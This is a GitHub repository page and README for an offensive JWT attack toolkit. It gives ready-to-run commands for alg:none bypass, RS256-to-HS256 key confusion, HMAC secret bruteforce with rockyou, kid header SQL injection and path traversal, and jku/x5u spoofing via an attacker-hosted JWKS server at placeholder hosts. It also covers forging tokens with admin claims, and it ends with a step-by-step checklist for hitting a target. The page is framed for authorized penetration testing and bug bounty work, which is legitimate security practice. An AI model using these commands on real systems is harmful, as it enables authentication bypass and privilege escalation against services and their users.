Skip to content

Zeeshanafridai/jwt-attack-suite

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
jwt_attacks
jwt_attacks
 
 
README.md
README.md
 
 
jwt_attack.py
jwt_attack.py
 
 
requirements.txt
requirements.txt
 
 

Repository files navigation

JWT Attack Suite

Offensive JWT testing toolkit for penetration testers and bug bounty hunters.

A comprehensive CLI tool covering every major JWT attack vector — from alg:none to RS256→HS256 confusion, weak secret bruteforce, kid injection, jku/x5u spoofing, and full token forgery.

Attacks Covered

# Attack Description
1 none alg:none bypass — all case/variant permutations
2 confusion RS256 → HS256 algorithm confusion with RSA public key
3 bruteforce Weak HMAC secret cracking (HS256/384/512), multithreaded
4 kid kid header SQL injection + path traversal (/dev/null)
5 jku jku header spoofing — host your own JWKS server
6 x5u x5u header spoofing — host your own X.509 cert
7 forge Arbitrary token forgery with known secret
8 privesc Auto-generate common privilege escalation token variants
9 embedded Embedded JWK attack (CVE-2018-0114 style)
10 decode Decode and pretty-print token claims

Installation

git clone https://github.com/yourhandle/jwt-attack-suite
cd jwt-attack-suite
pip install -r requirements.txt
chmod +x jwt_attack.py

Usage

Decode a token

python3 jwt_attack.py decode -t eyJhbGciOiJIUzI1NiJ9...

alg:none bypass

# Basic
python3 jwt_attack.py none -t <token>

# With claim injection
python3 jwt_attack.py none -t <token> --claims '{"role":"admin","sub":"1"}'

RS256 → HS256 Algorithm Confusion

# With local public key file
python3 jwt_attack.py confusion -t <token> --pubkey server_public.pem --claims '{"role":"admin"}'

# Auto-fetch from JWKS endpoint
python3 jwt_attack.py confusion -t <token> --jwks https://target.com/.well-known/jwks.json

Weak Secret Bruteforce

# Built-in quick wordlist
python3 jwt_attack.py bruteforce -t <token>

# Custom wordlist (rockyou, jwt-secrets, etc.)
python3 jwt_attack.py bruteforce -t <token> -w /usr/share/wordlists/rockyou.txt --threads 16

# If secret found, auto-forge with claims
python3 jwt_attack.py bruteforce -t <token> -w wordlist.txt --claims '{"admin":true}'

kid Header Injection

# All injection types (SQLi + path traversal)
python3 jwt_attack.py kid -t <token> --claims '{"role":"admin"}'

# Only SQLi payloads
python3 jwt_attack.py kid -t <token> --kid-type sqli

# Only path traversal
python3 jwt_attack.py kid -t <token> --kid-type path

# Custom kid value
python3 jwt_attack.py kid -t <token> --custom-kid "../../dev/null" --custom-secret ""

jku Header Spoofing

# Point server to your JWKS (you need to host it)
python3 jwt_attack.py jku -t <token> --attacker-url http://YOUR_IP:8888/jwks.json --claims '{"admin":true}'

# Auto-spin up local JWKS server
python3 jwt_attack.py jku -t <token> --attacker-url http://YOUR_IP:8888/jwks.json --serve --port 8888

Token Forgery (known secret)

python3 jwt_attack.py forge -t <token> --secret "mysecret" --claims '{"role":"admin","sub":"0"}'

# With extended expiry (1 year)
python3 jwt_attack.py forge -t <token> --secret "mysecret" --claims '{"role":"admin"}' --extend-exp 31536000

Privilege Escalation Auto-Payloads

python3 jwt_attack.py privesc -t <token> --secret "mysecret"

Embedded JWK Attack

python3 jwt_attack.py embedded -t <token> --claims '{"role":"admin"}'

Run All Attacks

python3 jwt_attack.py all -t <token> --claims '{"role":"admin"}' -w wordlist.txt -o results.json

Save Results

python3 jwt_attack.py bruteforce -t <token> -w rockyou.txt -o output.json

Real-World Attack Flow

Bug Bounty JWT Testing Checklist

1. Decode the token — check alg, claims, kid, jku fields
   → python3 jwt_attack.py decode -t TOKEN

2. Try alg:none
   → python3 jwt_attack.py none -t TOKEN --claims '{"role":"admin"}'

3. Check if alg is RS256 — grab public key from /jwks.json, /.well-known/jwks.json
   → python3 jwt_attack.py confusion -t TOKEN --jwks https://target.com/.well-known/jwks.json

4. Bruteforce HS256 secret
   → python3 jwt_attack.py bruteforce -t TOKEN -w jwt-secrets.txt

5. Check for kid header — try injection
   → python3 jwt_attack.py kid -t TOKEN --claims '{"role":"admin"}'

6. Check for jku/x5u — test if server fetches it
   → python3 jwt_attack.py jku -t TOKEN --attacker-url http://COLLAB/jwks.json --serve

Good JWT Secret Wordlists

Related CVEs / Research

Legal

For authorized penetration testing and bug bounty programs only. Do not use against systems you do not have explicit written permission to test.

License

MIT

About

A comprehensive JWT attack CLI covering every major vulnerability class — from alg:none bypass to RS256→HS256 algorithm confusion, HMAC secret bruteforce, kid header injection (SQLi + path traversal), jku/x5u spoofing with built-in JWKS server, and full token forgery. Built for bug bounty hunters and red teamers.

Topics

jwt web-security json-web-token jwt-security penetration-testing-tools bug-bounty-tools jwt-attacks token-forgery algorithm-confusion

Resources

Readme
Activity

Stars

0 stars

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

 
 
 

Contributors

Languages